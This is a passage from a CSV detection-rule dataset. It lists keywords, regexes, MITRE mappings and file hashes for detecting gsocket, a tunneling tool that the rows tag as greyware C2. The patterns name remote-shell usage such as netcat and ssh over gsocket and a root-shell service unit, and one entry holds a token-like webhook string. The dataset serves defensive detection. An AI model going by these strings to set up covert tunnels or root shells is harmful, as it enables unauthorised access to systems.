Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "* gsocket-*.tar.gz*",".{0,1000}\sgsocket\-.{0,1000}\.tar\.gz.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "* gsocket_*_all.deb*",".{0,1000}\sgsocket_.{0,1000}_all\.deb.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "* nc *.gsocket*",".{0,1000}\snc\s.{0,1000}\.gsocket.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "* nc gsocket 31337*",".{0,1000}\snc\sgsocket\s31337.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "* --remote gsocket*",".{0,1000}\s\-\-remote\sgsocket.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "* --rm -it --name gsocket*",".{0,1000}\s\-\-rm\s\-it\s\-\-name\sgsocket.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "* ssh *@gsocket*",".{0,1000}\sssh\s.{0,1000}\@gsocket.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "* start gs-sshd*",".{0,1000}\sstart\sgs\-sshd.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "* status gs-sshd*",".{0,1000}\sstatus\sgs\-sshd.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*/bin/gs-netcat*",".{0,1000}\/bin\/gs\-netcat.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*/etc/gsocket.conf*",".{0,1000}\/etc\/gsocket\.conf.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*/gsocket-*.tar.gz*",".{0,1000}\/gsocket\-.{0,1000}\.tar\.gz.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*/gsocket.git*",".{0,1000}\/gsocket\.git.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*/gsocket/releases/latest*",".{0,1000}\/gsocket\/releases\/latest.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*/gsocket_*_all.deb*",".{0,1000}\/gsocket_.{0,1000}_all\.deb.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*/gsocket_*_x86_64.deb*",".{0,1000}\/gsocket_.{0,1000}_x86_64\.deb.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*/gsocket_*aarch64.deb*",".{0,1000}\/gsocket_.{0,1000}aarch64\.deb.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*/gsocket_*arm.deb*",".{0,1000}\/gsocket_.{0,1000}arm\.deb.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*/gsocket_*armv6.deb*",".{0,1000}\/gsocket_.{0,1000}armv6\.deb.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*/gsocket_*armv7l.deb*",".{0,1000}\/gsocket_.{0,1000}armv7l\.deb.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*/gsocket_*i686.deb*",".{0,1000}\/gsocket_.{0,1000}i686\.deb.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*/gsocket_*mips32.deb*",".{0,1000}\/gsocket_.{0,1000}mips32\.deb.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*/gsocket_*mips64.deb*",".{0,1000}\/gsocket_.{0,1000}mips64\.deb.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*/gsocket_*mipsel.deb*",".{0,1000}\/gsocket_.{0,1000}mipsel\.deb.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*/gsocket_dso.so.*",".{0,1000}\/gsocket_dso\.so\..{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*/gsocket_latest_all.deb*",".{0,1000}\/gsocket_latest_all\.deb.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*/gsocket-build*",".{0,1000}\/gsocket\-build.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*/gsocket-deb*",".{0,1000}\/gsocket\-deb.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*/gsocket-pkg/*",".{0,1000}\/gsocket\-pkg\/.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*/gsocket-src*",".{0,1000}\/gsocket\-src.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*/gsocket-tor*",".{0,1000}\/gsocket\-tor.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*/gs-portforward.service*",".{0,1000}\/gs\-portforward\.service.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*/gs-root-shell.service*",".{0,1000}\/gs\-root\-shell\.service.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*/lib/gsocket_*.so*",".{0,1000}\/lib\/gsocket_.{0,1000}\.so.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*/raw/main/gsocket/*",".{0,1000}\/raw\/main\/gsocket\/.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*/root/.gs_with_tor*",".{0,1000}\/root\/\.gs_with_tor.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*/share/gsocket/*",".{0,1000}\/share\/gsocket\/.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*/tools/gs-pipe *",".{0,1000}\/tools\/gs\-pipe\s.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*/usr/bin/gs-mount*",".{0,1000}\/usr\/bin\/gs\-mount.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*/usr/bin/gs-netcat*",".{0,1000}\/usr\/bin\/gs\-netcat.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*/usr/bin/gsocket*",".{0,1000}\/usr\/bin\/gsocket.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*/usr/bin/gs-sftp*",".{0,1000}\/usr\/bin\/gs\-sftp.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*\gsocket-*.tar.gz*",".{0,1000}\\gsocket\-.{0,1000}\.tar\.gz.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*\gsocket_*_all.deb*",".{0,1000}\\gsocket_.{0,1000}_all\.deb.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*\gsocket_dso.so.*",".{0,1000}\\gsocket_dso\.so\..{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*] GS login detected. Total Users: *",".{0,1000}\]\sGS\slogin\sdetected\.\sTotal\sUsers\:\s.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*] GS logout detected. Remaining Users: *",".{0,1000}\]\sGS\slogout\sdetected\.\sRemaining\sUsers\:\s.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*00b5a02c0350f67ee2562d63461f29a2907e3e991b51a0fa3e424b102b1cf552*",".{0,1000}00b5a02c0350f67ee2562d63461f29a2907e3e991b51a0fa3e424b102b1cf552.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*05fb17382f049ded33be4d8d624a2b3cc246ab0814e44f07352c12e1880079b6*",".{0,1000}05fb17382f049ded33be4d8d624a2b3cc246ab0814e44f07352c12e1880079b6.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*06541ed5fb95052dfeda2cc6165732d1c125f9b49ed400f578750b03a67c418f*",".{0,1000}06541ed5fb95052dfeda2cc6165732d1c125f9b49ed400f578750b03a67c418f.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*0a5e1abf70407a1de22cd14107dca8019bab45e8bfe4c45ca1e05e7e8bb92e89*",".{0,1000}0a5e1abf70407a1de22cd14107dca8019bab45e8bfe4c45ca1e05e7e8bb92e89.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*0ca53778e8cf399b1052ba2f500881d04066525b65e8b564360e7b581ac9cf68*",".{0,1000}0ca53778e8cf399b1052ba2f500881d04066525b65e8b564360e7b581ac9cf68.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*0cf7ec1618e87248f23674db07692a63fbd4e945102b143baa5b34d7eebb5977*",".{0,1000}0cf7ec1618e87248f23674db07692a63fbd4e945102b143baa5b34d7eebb5977.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*0da3621a6676dcb4ac7e260ea7280a14d05c9bcc02c0a296a6507172a3cc7bd8*",".{0,1000}0da3621a6676dcb4ac7e260ea7280a14d05c9bcc02c0a296a6507172a3cc7bd8.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*0dd41d5c99202fa4387bb5b9db7ce55236fc913b65e3a9fb58f697d3480f14ef*",".{0,1000}0dd41d5c99202fa4387bb5b9db7ce55236fc913b65e3a9fb58f697d3480f14ef.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*0e95446bac57b2a3276703c700865bf025f1eac27bc5c9ebcf820c1e351b6732*",".{0,1000}0e95446bac57b2a3276703c700865bf025f1eac27bc5c9ebcf820c1e351b6732.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*0f948584d230abb0e870a4e46541cdf4dd8b60f23fa7e031d27cd856bc49b4c4*",".{0,1000}0f948584d230abb0e870a4e46541cdf4dd8b60f23fa7e031d27cd856bc49b4c4.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*1106565073956253736/mEDRS5iY0S4sgUnRh8Q5pC4S54zYwczZhGOwXvR3vKr7YQmA0Ej1-Ig60Rh4P_TGFq-m*",".{0,1000}1106565073956253736\/mEDRS5iY0S4sgUnRh8Q5pC4S54zYwczZhGOwXvR3vKr7YQmA0Ej1\-Ig60Rh4P_TGFq\-m.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*1160bcaa562e5a40c74e633ec58a2518b110e74b1d3f48bfa06f74f72cf9ff98*",".{0,1000}1160bcaa562e5a40c74e633ec58a2518b110e74b1d3f48bfa06f74f72cf9ff98.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*11f50c95d4dbcd97d5c76753aa7bc38bb615295f553a4c989015176ac0fa3be3*",".{0,1000}11f50c95d4dbcd97d5c76753aa7bc38bb615295f553a4c989015176ac0fa3be3.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*155c711cf850d024e86f65be8ff0f9e7e0e947c5632350913dadf8cc678909fa*",".{0,1000}155c711cf850d024e86f65be8ff0f9e7e0e947c5632350913dadf8cc678909fa.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*17eb30ef4d91991b265d5d93ab7f4ad6b58d43061a46ba3292142b962be95f7d*",".{0,1000}17eb30ef4d91991b265d5d93ab7f4ad6b58d43061a46ba3292142b962be95f7d.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*1a1be3746ab4055e51557ec20f236da58a4dcbe1a523c8f5a2cd5dc97e699533*",".{0,1000}1a1be3746ab4055e51557ec20f236da58a4dcbe1a523c8f5a2cd5dc97e699533.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*1ab1fb9214bf799302b9204b211eec714d0c1fd551ca45adeab8483a350719a3*",".{0,1000}1ab1fb9214bf799302b9204b211eec714d0c1fd551ca45adeab8483a350719a3.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*1ba34d4d223d6a532c194e578a3efc5e8aeae8bf657223614c502e28d84942cf*",".{0,1000}1ba34d4d223d6a532c194e578a3efc5e8aeae8bf657223614c502e28d84942cf.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*1d4c6a6ae56e7a9983254e4a31a368ebea653d96277466ffb8127e8ce0b54369*",".{0,1000}1d4c6a6ae56e7a9983254e4a31a368ebea653d96277466ffb8127e8ce0b54369.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*2028fe2f9036b7fd8f192b6c9844acaa40bec1f40cead52c0ebc5defd9255f64*",".{0,1000}2028fe2f9036b7fd8f192b6c9844acaa40bec1f40cead52c0ebc5defd9255f64.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*2042b3773e03285939fe7f0d0597a77c8d4958644b1d8a366cc71d384f1e5c30*",".{0,1000}2042b3773e03285939fe7f0d0597a77c8d4958644b1d8a366cc71d384f1e5c30.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - 